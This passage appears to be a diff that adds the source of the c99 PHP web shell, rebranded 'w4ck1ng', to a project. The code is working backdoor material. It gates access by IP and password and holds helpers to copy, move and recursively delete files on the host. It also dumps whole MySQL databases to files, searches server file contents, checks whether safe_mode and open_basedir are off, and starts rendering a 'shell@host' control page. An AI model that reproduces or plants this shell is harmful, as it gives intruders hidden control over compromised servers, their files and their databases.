+if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("Access Denied");}
+if (!empty($login))
+{
+ if (empty($md5_pass)) {$md5_pass = md5($pass);}
+ if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass))
+ {
+  if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace("&nbsp;|<br>"," ",$donated_html));}
+  header("WWW-Authenticate: Basic realm=\"".$login_txt."\"");
+  header("HTTP/1.0 401 Unauthorized");
+  exit($accessdeniedmess);
+ }
+}
+if ($act != "img"){
+$lastdir = realpath(".");
+chdir($curdir);
+if ($selfwrite or $updatenow) {@ob_clean(); c99sh_getupdate($selfwrite,1); exit;}
+$sess_data = unserialize($_COOKIE["$sess_cookie"]);
+if (!is_array($sess_data)) {$sess_data = array();}
+if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
+if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
+
+$disablefunc = @ini_get("disable_functions");
+if (!empty($disablefunc))
+{
+ $disablefunc = str_replace(" ","",$disablefunc);
+ $disablefunc = explode(",",$disablefunc);
+}
+
+if (!function_exists("c99_buff_prepare"))
+{
+function c99_buff_prepare()
+{
+ global $sess_data;
+ global $act;
+ foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
+ foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
+ $sess_data["copy"] = array_unique($sess_data["copy"]);
+ $sess_data["cut"] = array_unique($sess_data["cut"]);
+ sort($sess_data["copy"]);
+ sort($sess_data["cut"]);
+ if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}}
+ else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}}
+}
+}
+c99_buff_prepare();
+if (!function_exists("c99_sess_put"))
+{
+function c99_sess_put($data)
+{
+ global $sess_cookie;
+ global $sess_data;
+ c99_buff_prepare();
+ $sess_data = $data;
+ $data = serialize($data);
+ setcookie($sess_cookie,$data);
+}
+}
+foreach (array("sort","sql_sort") as $v)
+{
+ if (!empty($_GET[$v])) {$$v = $_GET[$v];}
+ if (!empty($_POST[$v])) {$$v = $_POST[$v];}
+}
+if ($sort_save)
+{
+ if (!empty($sort)) {setcookie("sort",$sort);}
+ if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}
+}
+if (!function_exists("str2mini"))
+{
+function str2mini($content,$len)
+{
+ if (strlen($content) > $len)
+ {
+  $len = ceil($len/2) - 2;
+  return substr($content, 0,$len)."...".substr($content,-$len);
+ }
+ else {return $content;}
+}
+}
+if (!function_exists("view_size"))
+{
+function view_size($size)
+{
+ if (!is_numeric($size)) {return FALSE;}
+ else
+ {
+  if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
+  elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
+  elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
+  else {$size = $size . " B";}
+  return $size;
+ }
+}
+}
+if (!function_exists("fs_copy_dir"))
+{
+function fs_copy_dir($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+ $h = opendir($d);
+ while (($o = readdir($h)) !== FALSE)
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+   else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+   if (!$ret) {return $ret;}
+  }
+ }
+ closedir($h);
+ return TRUE;
+}
+}
+if (!function_exists("fs_copy_obj"))
+{
+function fs_copy_obj($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
+ if (!is_dir(dirname($t))) {mkdir(dirname($t));}
+ if (is_dir($d))
+ {
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
+  return fs_copy_dir($d,$t);
+ }
+ elseif (is_file($d)) {return copy($d,$t);}
+ else {return FALSE;}
+}
+}
+if (!function_exists("fs_move_dir"))
+{
+function fs_move_dir($d,$t)
+{
+ $h = opendir($d);
+ if (!is_dir($t)) {mkdir($t);}
+ while (($o = readdir($h)) !== FALSE)
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   $ret = TRUE;
+   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+   else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}}
+   if (!$ret) {return $ret;}
+  }
+ }
+ closedir($h);
+ return TRUE;
+}
+}
+if (!function_exists("fs_move_obj"))
+{
+function fs_move_obj($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
+ if (is_dir($d))
+ {
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
+  return fs_move_dir($d,$t);
+ }
+ elseif (is_file($d))
+ {
+  if(copy($d,$t)) {return unlink($d);}
+  else {unlink($t); return FALSE;}
+ }
+ else {return FALSE;}
+}
+}
+if (!function_exists("fs_rmdir"))
+{
+function fs_rmdir($d)
+{
+ $h = opendir($d);
+ while (($o = readdir($h)) !== FALSE)
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   if (!is_dir($d.$o)) {unlink($d.$o);}
+   else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
+  }
+ }
+ closedir($h);
+ rmdir($d);
+ return !is_dir($d);
+}
+}
+if (!function_exists("fs_rmobj"))
+{
+function fs_rmobj($o)
+{
+ $o = str_replace("\\",DIRECTORY_SEPARATOR,$o);
+ if (is_dir($o))
+ {
+  if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
+  return fs_rmdir($o);
+ }
+ elseif (is_file($o)) {return unlink($o);}
+ else {return FALSE;}
+}
+}
+if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}}
+if (!function_exists("view_perms"))
+{
+function view_perms($mode)
+{
+ if (($mode & 0xC000) === 0xC000) {$type = "s";}
+ elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
+ elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
+ elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
+ elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
+ elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
+ elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
+ else {$type = "?";}
+
+ $owner["read"] = ($mode & 00400)?"r":"-";
+ $owner["write"] = ($mode & 00200)?"w":"-";
+ $owner["execute"] = ($mode & 00100)?"x":"-";
+ $group["read"] = ($mode & 00040)?"r":"-";
+ $group["write"] = ($mode & 00020)?"w":"-";
+ $group["execute"] = ($mode & 00010)?"x":"-";
+ $world["read"] = ($mode & 00004)?"r":"-";
+ $world["write"] = ($mode & 00002)? "w":"-";
+ $world["execute"] = ($mode & 00001)?"x":"-";
+
+ if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
+ if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
+ if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
+
+ return $type.join("",$owner).join("",$group).join("",$world);
+}
+}
+if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}}
+if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}}
+if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}}
+if (!function_exists("parse_perms"))
+{
+function parse_perms($mode)
+{
+ if (($mode & 0xC000) === 0xC000) {$t = "s";}
+ elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
+ elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
+ elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
+ elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
+ elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
+ elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
+ else {$t = "?";}
+ $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
+ $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
+ $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
+ return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
+}
+}
+if (!function_exists("parsesort"))
+{
+function parsesort($sort)
+{
+ $one = intval($sort);
+ $second = substr($sort,-1);
+ if ($second != "d") {$second = "a";}
+ return array($one,$second);
+}
+}
+if (!function_exists("view_perms_color"))
+{
+function view_perms_color($o)
+{
+ if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";}
+ elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";}
+ else {return "<font color=green>".view_perms(fileperms($o))."</font>";}
+}
+}
+if (!function_exists("mysql_dump")){
+function mysql_dump($set)
+{
+ global $shver;
+ $sock = $set["sock"];
+ $db = $set["db"];
+ $print = $set["print"];
+ $nl2br = $set["nl2br"];
+ $file = $set["file"];
+ $add_drop = $set["add_drop"];
+ $tabs = $set["tabs"];
+ $onlytabs = $set["onlytabs"];
+ $ret = array();
+ $ret["err"] = array();
+ if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
+ if (empty($db)) {$db = "db";}
+ if (empty($print)) {$print = 0;}
+ if (empty($nl2br)) {$nl2br = 0;}
+ if (empty($add_drop)) {$add_drop = TRUE;}
+ if (empty($file))
+ {
+  $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
+ }
+ if (!is_array($tabs)) {$tabs = array();}
+ if (empty($add_drop)) {$add_drop = TRUE;}
+ if (sizeof($tabs) == 0)
+ {
+  // retrive tables-list
+  $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
+  if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
+ }
+ $out = "# Dumped by ".$shver."
+# Home page: http://w4ck1ng.com
+#
+# Host settings:
+# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
+# Date: ".date("d.m.Y H:i:s")."
+# DB: \"".$db."\"
+#---------------------------------------------------------
+";
+ $c = count($onlytabs);
+ foreach($tabs as $tab)
+ {
+  if ((in_array($tab,$onlytabs)) or (!$c))
+  {
+   if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
+   // recieve query for create table structure
+   $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
+   if (!$res) {$ret["err"][] = mysql_smarterror();}
+   else
+   {
+    $row = mysql_fetch_row($res);
+    $out .= $row["1"].";\n\n";
+    // recieve table variables
+    $res = mysql_query("SELECT * FROM `$tab`", $sock);
+    if (mysql_num_rows($res) > 0)
+    {
+     while ($row = mysql_fetch_assoc($res))
+     {
+      $keys = implode("`, `", array_keys($row));
+      $values = array_values($row);
+      foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+      $values = implode("', '", $values);
+      $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
+      $out .= $sql;
+     }
+    }
+   }
+  }
+ }
+ $out .= "#---------------------------------------------------------------------------------\n\n";
+ if ($file)
+ {
+  $fp = fopen($file, "w");
+  if (!$fp) {$ret["err"][] = 2;}
+  else
+  {
+   fwrite ($fp, $out);
+   fclose ($fp);
+  }
+ }
+ if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
+ return $out;
+}
+}
+if (!function_exists("mysql_buildwhere"))
+{
+function mysql_buildwhere($array,$sep=" and",$functs=array())
+{
+ if (!is_array($array)) {$array = array();}
+ $result = "";
+ foreach($array as $k=>$v)
+ {
+  $value = "";
+  if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
+  $value .= "'".addslashes($v)."'";
+  if (!empty($functs[$k])) {$value .= ")";}
+  $result .= "`".$k."` = ".$value.$sep;
+ }
+ $result = substr($result,0,strlen($result)-strlen($sep));
+ return $result;
+}
+}
+if (!function_exists("mysql_fetch_all"))
+{
+function mysql_fetch_all($query,$sock)
+{
+ if ($sock) {$result = mysql_query($query,$sock);}
+ else {$result = mysql_query($query);}
+ $array = array();
+ while ($row = mysql_fetch_array($result)) {$array[] = $row;}
+ mysql_free_result($result);
+ return $array;
+}
+}
+if (!function_exists("mysql_smarterror"))
+{
+function mysql_smarterror($type,$sock)
+{
+ if ($sock) {$error = mysql_error($sock);}
+ else {$error = mysql_error();}
+ $error = htmlspecialchars($error);
+ return $error;
+}
+}
+if (!function_exists("mysql_query_form"))
+{
+function mysql_query_form()
+{
+ global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
+ if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+ if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+ if ((!$submit) or ($sql_act))
+ {
+  echo "<table border=0><tr><td><form name=\"c99sh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\">&nbsp;<input type=submit value=\"No\"></form></td>";
+  if ($tbl_struct)
+  {
+   echo "<td valign=\"top\"><b>Fields:</b><br>";
+   foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» <a href=\"#\" onclick=\"document.c99sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
+   echo "</td></tr></table>";
+  }
+ }
+ if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
+}
+}
+if (!function_exists("mysql_create_db"))
+{
+function mysql_create_db($db,$sock="")
+{
+ $sql = "CREATE DATABASE `".addslashes($db)."`;";
+ if ($sock) {return mysql_query($sql,$sock);}
+ else {return mysql_query($sql);}
+}
+}
+if (!function_exists("mysql_query_parse"))
+{
+function mysql_query_parse($query)
+{
+ $query = trim($query);
+ $arr = explode (" ",$query);
+ /*array array()
+ {
+  "METHOD"=>array(output_type),
+  "METHOD1"...
+  ...
+ }
+ if output_type == 0, no output,
+ if output_type == 1, no output if no error
+ if output_type == 2, output without control-buttons
+ if output_type == 3, output with control-buttons
+ */
+ $types = array(
+  "SELECT"=>array(3,1),
+  "SHOW"=>array(2,1),
+  "DELETE"=>array(1),
+  "DROP"=>array(1)
+ );
+ $result = array();
+ $op = strtoupper($arr[0]);
+ if (is_array($types[$op]))
+ {
+  $result["propertions"] = $types[$op];
+  $result["query"]  = $query;
+  if ($types[$op] == 2)
+  {
+   foreach($arr as $k=>$v)
+   {
+    if (strtoupper($v) == "LIMIT")
+    {
+     $result["limit"] = $arr[$k+1];
+     $result["limit"] = explode(",",$result["limit"]);
+     if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
+     unset($arr[$k],$arr[$k+1]);
+    }
+   }
+  }
+ }
+ else {return FALSE;}
+}
+}
+if (!function_exists("c99fsearch"))
+{
+function c99fsearch($d)
+{
+ global $found;
+ global $found_d;
+ global $found_f;
+ global $search_i_f;
+ global $search_i_d;
+ global $a;
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+ $h = opendir($d);
+ while (($f = readdir($h)) !== FALSE)
+ {
+  if($f != "." && $f != "..")
+  {
+   $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f));
+   if (is_dir($d.$f))
+   {
+    $search_i_d++;
+    if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
+    if (!is_link($d.$f)) {c99fsearch($d.$f);}
+   }
+   else
+   {
+    $search_i_f++;
+    if ($bool)
+    {
+     if (!empty($a["text"]))
+     {
+      $r = @file_get_contents($d.$f);
+      if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}
+      if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
+      if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
+      else {$bool = strpos(" ".$r,$a["text"],1);}
+      if ($a["text_not"]) {$bool = !$bool;}
+      if ($bool) {$found[] = $d.$f; $found_f++;}
+     }
+     else {$found[] = $d.$f; $found_f++;}
+    }
+   }
+  }
+ }
+ closedir($h);
+}
+}
+if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}}
+//Sending headers
+@ob_start();
+@ob_implicit_flush(0);
+function onphpshutdown()
+{
+ global $gzipencode,$ft;
+ if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad")))
+ {
+  $v = @ob_get_contents();
+  @ob_end_clean();
+  @ob_start("ob_gzHandler");
+  echo $v;
+  @ob_end_flush();
+ }
+}
+function c99shexit()
+{
+ onphpshutdown();
+ exit;
+}
+header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
+header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
+header("Cache-Control: no-store, no-cache, must-revalidate");
+header("Cache-Control: post-check=0, pre-check=0", FALSE);
+header("Pragma: no-cache");
+if (empty($tmpdir))
+{
+ $tmpdir = ini_get("upload_tmp_dir");
+ if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}
+}
+$tmpdir = realpath($tmpdir);
+$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir);
+if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}
+if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}
+else {$tmpdir_logs = realpath($tmpdir_logs);}
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
+{
+ $safemode = TRUE;
+ $hsafemode = "<font color=red>ON (secure)</font>";
+}
+else {$safemode = FALSE; $hsafemode = "<font color=green>OFF (not secure)</font>";}
+$v = @ini_get("open_basedir");
+if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "<font color=red>".$v."</font>";}
+else {$openbasedir = FALSE; $hopenbasedir = "<font color=green>OFF (not secure)</font>";}
+$sort = htmlspecialchars($sort);
+if (empty($sort)) {$sort = $sort_default;}
+$sort[1] = strtolower($sort[1]);
+$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");
+if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();}
+$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE));
+@ini_set("highlight.bg",$highlight_bg); //FFFFFF
+@ini_set("highlight.comment",$highlight_comment); //#FF8000
+@ini_set("highlight.default",$highlight_default); //#0000BB
+@ini_set("highlight.html",$highlight_html); //#000000
+@ini_set("highlight.keyword",$highlight_keyword); //#007700
+@ini_set("highlight.string",$highlight_string); //#DD0000
+if (!is_array($actbox)) {$actbox = array();}
+$dspact = $act = htmlspecialchars($act);
+$disp_fullpath = $ls_arr = $notls = null;
+$ud = urlencode($d);
+?>
+
+<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title>shell@<?php echo getenv("HTTP_HOST"); ?></title><STYLE>
+TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}
+.style1 {
+	color: #FF0000;
+	font-weight: bold;
+}
+.style2 {font-size: -3}
+</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><div align="center"><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"></p>
+  <p><font size="-3"><span class="style2"></br>
+ <font color="#333333">k1ngw4ck1ng</font><font color="white">w</font><font color="#333333">4ck1</font><font color="white">ngw4ck1n</font><font color="#333333">gw4c</font><font color="white">k</font><font color="#333333">1ngw4ck</font><font color="white">1ngw</font><font color="#333333">4ck</font><font color="white">1</font><font color="#333333">ngw4ck1ngw4ck1ng</font><font color="white">w4</font><font color="#333333">ck1ngw4ck1</font><font color="white">n</font><font color="#333333">gw4ck1ngw</font><font color="white">4</font><font color="#333333">ck1ngw4ck1</font><font color="white">n</font><font color="#333333">gw4c</font><font color="white">k1ng</font><font color="#333333">w4ck1ngw4ck1ngw4ck1ngw4ck1ng</font><br>
+
+      <font color="#333333">w4ck1ngw4c</font><font color="white">k1n</font><font color="#333333">gw4ck</font><font color="white">1ngw4</font><font color="#333333">ck</font><font color="white">1ngw4ck1n</font><font color="#333333">gw</font><font color="white">4ck1n</font><font color="#333333">g</font><font color="white">w</font><font color="#333333">4ck1ngw4ck</font><font color="white">1ngw4</font><font color="#333333">ck</font><font color="white">1ng</font><font color="#333333">w4ck1n</font><font color="white">gw4ck1</font><font color="#333333">ngw4ck</font><font color="white">1n</font><font color="#333333">gw4ck1ngw</font><font color="white">4ck</font><font color="#333333">1ng</font><font color="white">w4ck</font><font color="#333333">1ngw4ck1ngw4ck1ngw4ck1ngw4ck</font><br>
+
+      <font color="#333333">1ngw4ck1ng</font><font color="white">w4ck</font><font color="#333333">1ngw</font><font color="white">4ck1</font><font color="#333333">ngw4</font><font color="white">ck1</font><font color="#333333">ng</font><font color="white">w4c</font><font color="#333333">k1</font><font color="white">ngw4</font><font color="#333333">c</font><font color="white">k1</font><font color="#333333">ngw</font><font color="white">4</font><font color="#333333">ck</font><font color="white">1ngw4ck1ng</font><font color="#333333">w</font><font color="white">4ck</font><font color="#333333">1ng</font><font color="white">w4ck1n</font><font color="#333333">gw4ck1ngw</font><font color="white">4ck</font><font color="#333333">1ngw4ck1</font><font color="white">ngw4</font><font color="#333333">c</font><font color="white">k1ngw</font><font color="#333333">4ck1n</font><font color="white">gw4ck1ngw4ck</font><font color="#333333">1ngw4ck1ngw</font><br>
+
+      <font color="#333333">4ck1ngw4ck1</font><font color="white">ngw4</font><font color="#333333">ck</font><font color="white">1ngw4</font><font color="#333333">ck1</font><font color="white">ngw4</font><font color="#333333">ck1ngw</font><font color="white">4ck1</font><font color="#333333">n</font><font color="white">gw4</font><font color="#333333">ck1</font><font color="white">ngw4ck</font><font color="#333333">1ngw4</font><font color="white">ck</font><font color="#333333">1</font><font color="white">ngw4ck1n</font><font color="#333333">gw4ck1ngw4ck</font><font color="white">1ngw</font><font color="#333333">4ck1ngw4</font><font color="white">ck1n</font><font color="#333333">g</font><font color="white">w4ck1ngw4ck</font><font color="#333333">1ngw4c</font><font color="white">k1ngw</font><font color="#333333">4ck1ngw4ck1</font><br>
+
+      <font color="#333333">ngw4ck1ngw4c</font><font color="white">k1ngw4ck1ng</font><font color="#333333">w4</font><font color="white">ck1n</font><font color="#333333">gw4ck1</font><font color="white">ngw4</font><font color="#333333">c</font><font color="white">k1ngw4ck1n</font><font color="#333333">gw4ck1n</font><font color="white">gw4ck1ngw4ck</font><font color="#333333">1ngw4ck1ng</font><font color="white">w4ck1</font><font color="#333333">ngw4ck1</font><font color="white">ngw4ck1ngw4ck1ng</font><font color="#333333">w4ck1ng</font><font color="white">w4ck1n</font><font color="#333333">gw4ck1ngw4</font><br>
+
+      <font color="#333333">ck1ngw4ck1ng</font><font color="white">w4ck1ngw</font><font color="#333333">4c</font><font color="white">k1ngw4c</font><font color="#333333">k1ng</font><font color="white">w4ck1ngw4c</font><font color="#333333">k1n</font><font color="white">gw4c</font><font color="#333333">k1ngw4c</font><font color="white">k1ngw4ck1ngw4ck</font><font color="#333333">1ngw4c</font><font color="white">k1</font><font color="#333333">n</font><font color="white">gw4</font><font color="#333333">ck1ngw4</font><font color="white">ck1ngw4ck1ngw4ck1ngw4ck1ngw</font><font color="#333333">4ck1ngw4ck1n</font><br>
+
+      <font color="#333333">gw4ck1ngw4ck1</font><font color="white">ngw4ck</font><font color="#333333">1ngw</font><font color="white">4ck1ng</font><font color="#333333">w4c</font><font color="white">k1ngw</font><font color="#333333">4</font><font color="white">ck1n</font><font color="#333333">gw4c</font><font color="white">k1ng</font><font color="#333333">w4ck1n</font><font color="white">gw4ck1ngw4ck1ngw4ck1</font><font color="#333333">ngw4ck</font><font color="white">1ng</font><font color="#333333">w4ck1n</font><font color="white">gw4</font><font color="#333333">c</font><font color="white">k1ngw4</font><font color="#333333">ck1</font><font color="white">ngw4</font><font color="#333333">ck1ngw4</font><font color="white">ck1</font><font color="#333333">ngw4ck1ngw4c</font><br>
+
+      <font color="#333333">k1ngw4ck1ngw4c</font><font color="white">k1ngw</font><font color="#333333">4ck1n</font><font color="white">gw4ck</font><font color="#333333">1ngw4ck1n</font><font color="white">gw4c</font><font color="#333333">k1ngw</font><font color="white">4ck1ngw4ck1n</font><font color="#333333">g</font><font color="white">w4ck1</font><font color="#333333">ngw4</font><font color="white">ck1ngw4ck</font><font color="#333333">1ngw</font><font color="white">4ck</font><font color="#333333">1ngw4c</font><font color="white">k1n</font><font color="#333333">gw</font><font color="white">4ck1</font><font color="#333333">ngw4ck1n</font><font color="white">g</font><font color="#333333">w4ck1n</font><font color="white">gw4c</font><font color="#333333">k1ngw4ck1ng</font><br>
+
